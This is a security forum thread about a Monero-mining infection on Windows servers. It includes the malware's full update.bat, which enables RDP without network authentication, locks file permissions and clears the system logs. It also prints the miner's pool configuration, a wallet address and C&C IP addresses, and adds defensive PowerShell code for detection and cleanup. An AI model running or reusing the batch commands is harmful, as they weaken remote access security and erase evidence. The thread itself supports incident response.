Possible New Miner & Ransomware
4 replies to this topic

#1 kiralon

Posted 26 December 2017 - 08:09 PM

not sure
Just finished removing a nasty from a clients server that looked to be mining monero
 
Unlikely it came from email as they are protected by message labs (but still possible)
Could be a drive by download.
Systems were running SEP (which was disabled)
Teamviewer password was changed.
Terminal Server was infected first, then moved to other servers

Creates an adobe update scheduled task to run update.bat every hour.
 
It creates 4 files
3 in c:\windows\fonts
update.bat
svchost.exe
config.json
 
1 in c:\windows\conhost     (makes the folder)
conhost.exe
This is evidently the "BitLocker Drive Encryption Servicing Utility" (per its file description). I'm guessing that encryption follows mining.
Original filename: FVEUpdate.Exe
 
update.bat does the following (every hour)
@echo off
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"
@echo y|cacls C:\Windows\Fonts\svchost.exe /p everyone:r
@echo y|cacls C:\Windows\conhost\conhost.exe /p everyone:r
@echo y|cacls C:\Windows\Fonts\config.json /p everyone:r
@echo y|cacls C:\Windows\conhost\conhost.exe /p everyone:r
wevtutil cl system
wevtutil cl security
wevtutil cl application
taskkill /im xmrig.exe /f

svchost is the xmrig mining tool

config.json contains

{
"algo": "cryptonight",
"av": 0,
"background": false,
"colors": true,
"cpu-affinity": null,
"cpu-priority": null,
"donate-level": 0,
"log-file": null,
"max-cpu-usage": 75,
"print-time": 60,
"retries": 5,
"retry-pause": 5,
"safe": false,
"syslog": false,
"threads": "null",
"pools": [
{
"url": "get.bi-chi.com:3333",
"user":"49ER579mEyp4Mxq8NW8AfmX4KcXN1S6urWGdSmCrfittYEkoHLEgJaiUqbNA6LDrSL1QPbuLMPYMQB4e5YApiQbkKofE1i1",
"pass": "x",
"keepalive": true,
"nicehash": false
},
{
"url": "pool.minemonero.pro:5555",
"user": "49ER579mEyp4Mxq8NW8AfmX4KcXN1S6urWGdSmCrfittYEkoHLEgJaiUqbNA6LDrSL1QPbuLMPYMQB4e5YApiQbkKofE1i1",
"pass": "x",
"keepalive": true,
"nicehash": false
}
]
}

and adds the following reg keys (could be more)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMIUpdateService]
"Type"=dword:00000010
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):43,00,3a,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,73,00,\
5c,00,63,00,6f,00,6e,00,68,00,6f,00,73,00,74,00,5c,00,63,00,6f,00,6e,00,68,\
00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,00,00
"DisplayName"="WMIUpdateService"
"ObjectName"="LocalSystem"
"DelayedAutostart"=dword:00000000
"FailureActionsOnNonCrashFailures"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMIUpdateService\Parameters]
"Application"=hex(2):43,00,3a,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,73,\
00,5c,00,46,00,6f,00,6e,00,74,00,73,00,5c,00,73,00,76,00,63,00,68,00,6f,00,\
73,00,74,00,2e,00,65,00,78,00,65,00,00,00
"AppParameters"=hex(2):00,00
"AppDirectory"=hex(2):43,00,3a,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,73,\
00,5c,00,46,00,6f,00,6e,00,74,00,73,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMIUpdateService\Parameters\AppExit]
@="Restart"
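An added triage example to go with the post above (not part of the original post or the malware itself): a PowerShell function that checks a host for the artifacts kiralon lists, namely the hourly task that runs update.bat, the three files under C:\Windows\Fonts plus conhost.exe under C:\Windows\conhost, the WMIUpdateService service, the Terminal Services policy values update.bat rewrites (RDP forced on, NLA off), the event-log clearing it does with wevtutil, and any live connection to the pool ports 3333/5555 from config.json. The paths, names and ports come from the post; the function name, the finding categories and the servers.txt fleet list are this example's own assumptions. Needs PowerShell 4+ (Get-FileHash) and the ScheduledTasks/NetTCPIP modules present on Server 2012 and later.

```powershell
# Added triage example (not from the original post). Hunts for the artifacts
# kiralon describes. Run elevated; returns one object per finding.
function Find-MinerArtifacts {
    [CmdletBinding()]
    param()

    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding([string]$Kind, [string]$Detail) {
        $findings.Add([pscustomobject]@{ Host = $env:COMPUTERNAME; Kind = $Kind; Detail = $Detail })
    }

    # 1. Dropped files. Hash them: update.bat wipes the event logs every hour,
    #    so the files may be the only evidence left on the box.
    $paths = 'C:\Windows\Fonts\svchost.exe', 'C:\Windows\Fonts\update.bat',
             'C:\Windows\Fonts\config.json', 'C:\Windows\conhost\conhost.exe'
    foreach ($p in $paths) {
        if (Test-Path -LiteralPath $p) {
            $hash = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
            Add-Finding 'DroppedFile' "$p sha256=$hash"
        }
    }

    # 2. The hourly task posing as an Adobe updater; match on the action, not
    #    the task name, since the name may differ between variants.
    Get-ScheduledTask -ErrorAction SilentlyContinue |
        Where-Object { ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -match 'update\.bat' } |
        ForEach-Object { Add-Finding 'ScheduledTask' "$($_.TaskPath)$($_.TaskName)" }

    # 3. The service wrapper that launches svchost.exe (xmrig) from C:\Windows\Fonts.
    $svcKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\WMIUpdateService'
    if (Test-Path $svcKey) {
        $img = (Get-ItemProperty -Path $svcKey).ImagePath
        $app = (Get-ItemProperty -Path "$svcKey\Parameters" -ErrorAction SilentlyContinue).Application
        Add-Finding 'Service' "WMIUpdateService ImagePath=$img Application=$app"
    }

    # 4. RDP policy values written by update.bat (the Policies key overrides
    #    whatever is configured on the listener itself).
    $tsPol = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
    $pol = Get-ItemProperty -Path $tsPol -ErrorAction SilentlyContinue
    if ($pol -and $pol.UserAuthentication -eq 0) { Add-Finding 'RdpPolicy' 'NLA disabled via policy (UserAuthentication=0)' }
    if ($pol -and $pol.fDenyTSConnections -eq 0) { Add-Finding 'RdpPolicy' 'RDP forced on via policy (fDenyTSConnections=0)' }

    # 5. "wevtutil cl" leaves a trace: 1102 in Security, 104 in System for the
    #    System and Application logs. Clearing every hour is itself the signal.
    $cleared = @(Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 1102 } -MaxEvents 5 -ErrorAction SilentlyContinue) +
               @(Get-WinEvent -FilterHashtable @{ LogName = 'System';   Id = 104  } -MaxEvents 5 -ErrorAction SilentlyContinue)
    foreach ($e in $cleared) { Add-Finding 'LogCleared' "$($e.LogName) cleared at $($e.TimeCreated)" }

    # 6. Running binaries out of the drop folders, and live pool connections.
    Get-Process -ErrorAction SilentlyContinue |
        Where-Object { $_.Path -like 'C:\Windows\Fonts\*' -or $_.Path -like 'C:\Windows\conhost\*' } |
        ForEach-Object { Add-Finding 'Process' "$($_.ProcessName) pid=$($_.Id) path=$($_.Path)" }
    Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
        Where-Object { $_.RemotePort -in 3333, 5555 } |
        ForEach-Object { Add-Finding 'PoolConnection' "$($_.RemoteAddress):$($_.RemotePort) pid=$($_.OwningProcess)" }

    return $findings
}

# Local run, or fan out over the fleet (servers.txt is an assumed host list):
# Invoke-Command -ComputerName (Get-Content .\servers.txt) -ScriptBlock ${function:Find-MinerArtifacts} | Format-Table -AutoSize
Find-MinerArtifacts | Format-Table -AutoSize
```

The "LogCleared" check is the one worth keeping in a scheduled hunt even after cleanup: a Security log that is cleared on the hour, on a server nobody is maintaining, is a better long-term indicator than the file names, which are trivial for the operator to change.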

#2 Danktified

Posted 04 January 2018 - 11:04 AM

Did you ever figure out how it spread? I squashed this infection on about 25 servers it had spread to in a few days.



#3 kiralon (Topic Starter)

Posted 04 January 2018 - 05:53 PM

Because of the machines it got on to I assumed it managed to steal some administrative credentials, so I changed all the administrative level passwords.

But not specifically no sorry.

#4 quietman7 (Global Moderator)

Posted 05 January 2018 - 06:55 AM

Were your files encrypted?
If so, are there any obvious file extensions appended to or with your encrypted data files....what is the extension and is it the same for each encrypted file or is it different?
Did you find any ransom notes and if so, what is the actual name of the note?
Did the cyber-criminals provide an email address to send payment to? If so, what is the email address?

The best way to identify the different ransomwares is the ransom note (including its name), samples of the encrypted files, any obvious extensions appended to the encrypted files, information related to any email addresses or hyperlinks provided by the cyber-criminals to request payment and the malware file responsible for the infection.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

#5 Danktified

Posted 05 January 2018 - 12:28 PM

There was no encryption, as far as I could tell they were solely trying to use CPU cycles. I had a similar, but slightly different version of the malware he mentioned. I used ProcMon to watch what the executable was doing and it talked once to what I assume is a C&C server, and then all other communications were with a couple monero mining sites.

C&C server addresses were 107.191.99.95 and 107.191.99.227

It was mining for 185.154.14.75:3333 until I blocked that, then it failed over to 45.32.210.133:5555.

Once both were blocked, CPU usage dropped down to 0%.

The update.bat, config.json, and svchost.exe files are only created when conhost.exe is running. Once you kill conhost, the other files disappear.

I couldn't find any method of spreading however, or the original file that "installed" the malware.

The original Filename for conhost for me was NOTEPAD.EXE
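An added containment and cleanup example drawing on both Danktified's observations (blocking the pool addresses stops the mining; the Fonts files vanish once conhost.exe is dead) and kiralon's persistence details (WMIUpdateService, the hourly task, the cacls everyone:r locks, the RDP/NLA policy values). This is not code from either poster or from the malware. The IP addresses and ports are the ones Danktified listed; the firewall rule names, the evidence folder and the order of steps are this example's own assumptions. Run elevated.

```powershell
# Added containment/cleanup example (not from the original posts).
# Step 1: cut the miner off from its pools and the suspected C&C hosts.
function Block-MinerTraffic {
    param(
        [string[]]$PoolAddresses = @('185.154.14.75', '45.32.210.133'),   # from Danktified's post
        [string[]]$CncAddresses  = @('107.191.99.95', '107.191.99.227')   # from Danktified's post
    )
    foreach ($ip in $PoolAddresses + $CncAddresses) {
        $name = "Block miner/C2 $ip"   # rule name is an assumption
        if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
            New-NetFirewallRule -DisplayName $name -Direction Outbound -Action Block `
                -RemoteAddress $ip -Profile Any | Out-Null
        }
    }
}

# Step 2: remove persistence in an order that sticks.
function Remove-MinerPersistence {
    # conhost.exe (the service wrapper) re-drops update.bat, config.json and
    # svchost.exe, so the service and process go first or the files come back.
    if (Get-Service -Name WMIUpdateService -ErrorAction SilentlyContinue) {
        Stop-Service -Name WMIUpdateService -Force -ErrorAction SilentlyContinue
        sc.exe delete WMIUpdateService | Out-Null
    }
    Get-Process -ErrorAction SilentlyContinue |
        Where-Object { $_.Path -like 'C:\Windows\conhost\*' -or $_.Path -like 'C:\Windows\Fonts\*' -or $_.ProcessName -eq 'xmrig' } |
        Stop-Process -Force -ErrorAction SilentlyContinue

    # The hourly task that re-runs update.bat (matched on its action, not its name).
    Get-ScheduledTask -ErrorAction SilentlyContinue |
        Where-Object { ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -match 'update\.bat' } |
        Unregister-ScheduledTask -Confirm:$false

    # Preserve the dropped files before removing them; update.bat has been
    # clearing the event logs, so these may be the only evidence left.
    $evidence = Join-Path $env:TEMP "miner-evidence-$env:COMPUTERNAME"   # location is an assumption
    New-Item -ItemType Directory -Path $evidence -Force | Out-Null
    $paths = 'C:\Windows\Fonts\svchost.exe', 'C:\Windows\Fonts\update.bat',
             'C:\Windows\Fonts\config.json', 'C:\Windows\conhost\conhost.exe'
    foreach ($p in $paths) {
        if (Test-Path -LiteralPath $p) {
            # update.bat replaced the ACL with "everyone:r"; take ownership first.
            takeown.exe /f $p | Out-Null
            icacls.exe $p /grant 'Administrators:F' | Out-Null
            Move-Item -LiteralPath $p -Destination $evidence -Force
        }
    }
    Remove-Item -LiteralPath 'C:\Windows\conhost' -Recurse -Force -ErrorAction SilentlyContinue

    # Undo update.bat's RDP changes: drop the policy overrides it wrote and put
    # NLA and TLS back on the listener. Re-apply your own RDP baseline afterwards.
    $tsPol = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
    foreach ($v in 'fDenyTSConnections', 'fAllowUnsolicited', 'UserAuthentication') {
        Remove-ItemProperty -Path $tsPol -Name $v -ErrorAction SilentlyContinue
    }
    $rdpTcp = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
    Set-ItemProperty -Path $rdpTcp -Name UserAuthentication -Value 1 -Type DWord   # NLA on
    Set-ItemProperty -Path $rdpTcp -Name SecurityLayer      -Value 2 -Type DWord   # TLS required
}

Block-MinerTraffic
Remove-MinerPersistence
```

Two caveats a practitioner would add. Blocking by IP is a stopgap: config.json points at hostnames (get.bi-chi.com, pool.minemonero.pro), which can be moved to new addresses at any time, so block the names at DNS or at the egress proxy as well. And none of this addresses how the miner got onto the terminal server in the first place; kiralon's step of rotating every administrative password (and the TeamViewer credential that was changed) is the part that actually stops the next server from being infected.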
